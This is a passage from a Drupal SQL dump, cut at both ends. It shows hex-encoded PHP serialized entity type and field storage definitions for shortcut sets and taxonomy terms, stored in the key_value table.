a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3238373b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d7d),
('entity.definitions.installed', 'shortcut_set.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31323a2273686f72746375745f736574223b733a383a22002a00636c617373223b733a33343a2244727570616c5c73686f72746375745c456e746974795c53686f7274637574536574223b733a31313a22002a0070726f7669646572223b733a383a2273686f7274637574223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a33343a2244727570616c5c73686f72746375745c456e746974795c53686f7274637574536574223b733a31313a22002a0068616e646c657273223b613a343a7b733a373a2273746f72616765223b733a33343a2244727570616c5c73686f72746375745c53686f727463757453657453746f72616765223b733a363a22616363657373223b733a34373a2244727570616c5c73686f72746375745c53686f7274637574536574416363657373436f6e74726f6c48616e646c6572223b733a31323a226c6973745f6275696c646572223b733a33383a2244727570616c5c73686f72746375745c53686f72746375745365744c6973744275696c646572223b733a343a22666f726d223b613a353a7b733a373a2264656661756c74223b733a33313a2244727570616c5c73686f72746375745c53686f7274637574536574466f726d223b733a333a22616464223b733a33313a2244727570616c5c73686f72746375745c53686f7274637574536574466f726d223b733a343a2265646974223b733a33313a2244727570616c5c73686f72746375745c53686f7274637574536574466f726d223b733a393a22637573746f6d697a65223b733a33333a2244727570616c5c73686f72746375745c466f726d5c536574437573746f6d697a65223b733a363a2264656c657465223b733a34323a2244727570616c5c73686f72746375745c466f726d5c53686f727463757453657444656c657465466f726d223b7d7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b4e3b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a343a7b733a31343a22637573746f6d697a652d666f726d223b733a36393a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f637573746f6d697a65223b733a31313a2264656c6574652d666f726d223b733a36363a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f64656c657465223b733a393a22656469742d666f726d223b733a35393a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d223b733a31303a22636f6c6c656374696f6e223b733a33373a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f7274637574223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b733a383a2273686f7274637574223b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a2253686f727463757420736574223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a2253686f72746375742073657473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a2273686f727463757420736574223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a2273686f72746375742073657473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31393a2240636f756e742073686f727463757420736574223b733a363a22706c7572616c223b733a32303a2240636f756e742073686f72746375742073657473223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32343a22636f6e6669673a73686f72746375745f7365745f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a333a22736574223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a323a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'taxonomy_term.entity_type', 0x4f3a33363a2244727570616c5c436f72655c456e746974795c436f6e74656e74456e7469747954797065223a34313a7b733a353a22002a006964223b733a31333a227461786f6e6f6d795f7465726d223b733a383a22002a00636c617373223b733a32373a2244727570616c5c7461786f6e6f6d795c456e746974795c5465726d223b733a31313a22002a0070726f7669646572223b733a383a227461786f6e6f6d79223b733a31353a22002a007374617469635f6361636865223b623a313b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a333a22746964223b733a383a227265766973696f6e223b733a31313a227265766973696f6e5f6964223b733a363a2262756e646c65223b733a333a22766964223b733a353a226c6162656c223b733a343a226e616d65223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a343a2275756964223b733a343a2275756964223b733a393a227075626c6973686564223b733a363a22737461747573223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b7d733a31363a22002a006f726967696e616c436c617373223b733a32373a2244727570616c5c7461786f6e6f6d795c456e746974795c5465726d223b733a31313a22002a0068616e646c657273223b613a383a7b733a373a2273746f72616765223b733a32373a2244727570616c5c7461786f6e6f6d795c5465726d53746f72616765223b733a31343a2273746f726167655f736368656d61223b733a33333a2244727570616c5c7461786f6e6f6d795c5465726d53746f72616765536368656d61223b733a31323a22766965775f6275696c646572223b733a33363a2244727570616c5c436f72655c456e746974795c456e74697479566965774275696c646572223b733a31323a226c6973745f6275696c646572223b733a33363a2244727570616c5c436f72655c456e746974795c456e746974794c6973744275696c646572223b733a363a22616363657373223b733a34303a2244727570616c5c7461786f6e6f6d795c5465726d416363657373436f6e74726f6c48616e646c6572223b733a31303a2276696577735f64617461223b733a32393a2244727570616c5c7461786f6e6f6d795c5465726d566965777344617461223b733a343a22666f726d223b613a343a7b733a373a2264656661756c74223b733a32343a2244727570616c5c7461786f6e6f6d795c5465726d466f726d223b733a363a2264656c657465223b733a33353a2244727570616c5c7461786f6e6f6d795c466f726d5c5465726d44656c657465466f726d223b733a31353a227265766973696f6e2d64656c657465223b733a34323a2244727570616c5c436f72655c456e746974795c466f726d5c5265766973696f6e44656c657465466f726d223b733a31353a227265766973696f6e2d726576657274223b733a34323a2244727570616c5c436f72655c456e746974795c466f726d5c5265766973696f6e526576657274466f726d223b7d733a31313a227472616e736c6174696f6e223b733a33383a2244727570616c5c7461786f6e6f6d795c5465726d5472616e736c6174696f6e48616e646c6572223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b4e3b733a32343a22002a00636f6c6c656374696f6e5f7065726d697373696f6e223b4e3b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a363a2262756e646c65223b733a383a22002a006c696e6b73223b613a373a7b733a393a2263616e6f6e6963616c223b733a33303a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d223b733a31313a2264656c6574652d666f726d223b733a33373a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f64656c657465223b733a393a22656469742d666f726d223b733a33353a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f65646974223b733a363a22637265617465223b733a31343a222f7461786f6e6f6d792f7465726d223b733a32303a227265766973696f6e2d64656c6574652d666f726d223b733a36323a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7265766973696f6e2f7b7461786f6e6f6d795f7465726d7d2f64656c657465223b733a32303a227265766973696f6e2d7265766572742d666f726d223b733a36323a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7265766973696f6e2f7b7461786f6e6f6d795f7465726d7d2f726576657274223b733a31353a2276657273696f6e2d686973746f7279223b733a34303a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7265766973696f6e73223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a22566f636162756c617279223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a22002a00626173655f7461626c65223b733a31383a227461786f6e6f6d795f7465726d5f64617461223b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b733a32383a227461786f6e6f6d795f7465726d5f6669656c645f7265766973696f6e223b733a31373a22002a007265766973696f6e5f7461626c65223b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b733a31333a22002a00646174615f7461626c65223b733a32343a227461786f6e6f6d795f7465726d5f6669656c645f64617461223b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a313b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a225461786f6e6f6d79207465726d223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a225461786f6e6f6d79207465726d73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a227461786f6e6f6d79207465726d223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a227461786f6e6f6d79207465726d73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a32303a2240636f756e74207461786f6e6f6d79207465726d223b733a363a22706c7572616c223b733a32313a2240636f756e74207461786f6e6f6d79207465726d73223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a373a22636f6e74656e74223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b733a34303a22656e746974792e7461786f6e6f6d795f766f636162756c6172792e6f766572766965775f666f726d223b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a313b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31383a227461786f6e6f6d795f7465726d5f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a333a7b733a31373a225461786f6e6f6d79486965726172636879223b613a303a7b7d733a31333a22456e746974794368616e676564223b4e3b733a32363a22456e74697479556e7472616e736c617461626c654669656c6473223b4e3b7d733a31333a22002a006164646974696f6e616c223b613a313a7b733a31343a22726f7574655f70726f7669646572223b613a313a7b733a383a227265766973696f6e223b733a35323a2244727570616c5c436f72655c456e746974795c526f7574696e675c5265766973696f6e48746d6c526f75746550726f7669646572223b7d7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a32353a22002a007265766973696f6e5f6d657461646174615f6b657973223b613a343a7b733a31333a227265766973696f6e5f75736572223b733a31333a227265766973696f6e5f75736572223b733a31363a227265766973696f6e5f63726561746564223b733a31363a227265766973696f6e5f63726561746564223b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b733a32303a227265766973696f6e5f6c6f675f6d657373616765223b733a31363a227265766973696f6e5f64656661756c74223b733a31363a227265766973696f6e5f64656661756c74223b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'taxonomy_term.field_storage_definitions', 0x613a31373a7b733a333a22746964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a225465726d204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22546865207465726d2049442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a333a22746964223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a323b7d733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a2275756964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2255554944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a22546865207465726d20555549442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a343a2275756964223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31353a226669656c645f6974656d3a75756964223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3132383b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a34303b7d733a373a22002a0074797065223b733a343a2275756964223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a353a2276616c7565223b613a313a7b693a303b733a353a2276616c7565223b7d7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31313a227265766973696f6e5f6964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a225265766973696f6e204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a31313a227265766973696f6e5f6964223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a37373b7d733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a383a226c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a224c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a373a22646973706c6179223b613a323a7b733a343a2276696577223b613a313a7b733a373a226f7074696f6e73223b613a313a7b733a363a22726567696f6e223b733a363a2268696464656e223b7d7d733a343a22666f726d223b613a313a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b7d7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31323a227472616e736c617461626c65223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32333a22546865207465726d206c616e677561676520636f64652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a383a226c616e67636f6465223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3131313b7d733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a333a22766964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a22566f636162756c617279223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a227265717569726564223b623a313b733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34353a2254686520766f636162756c61727920746f20776869636820746865207465726d2069732061737369676e65642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a333a22766964223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a32373a226669656c645f6974656d3a656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a333a7b733a31313a227461726765745f74797065223b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3135313b7d733a373a22002a0074797065223b733a31363a22656e746974795f7265666572656e6365223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a393a227461726765745f6964223b613a333a7b733a31313a226465736372697074696f6e223b733a32383a22546865204944206f66207468652074617267657420656e746974792e223b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b7d7d733a373a22696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31363a227265766973696f6e5f63726561746564223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a225265766973696f6e206372656174652074696d65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34373a225468652074696d652074686174207468652063757272656e74207265766973696f6e2077617320637265617465642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a383a2270726f7669646572223b733a383a227461786f6e6f6d79223b733a31303a226669656c645f6e616d65223b733a31363a227265766973696f6e5f63726561746564223b733a31313a22656e746974795f74797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b4e3b733a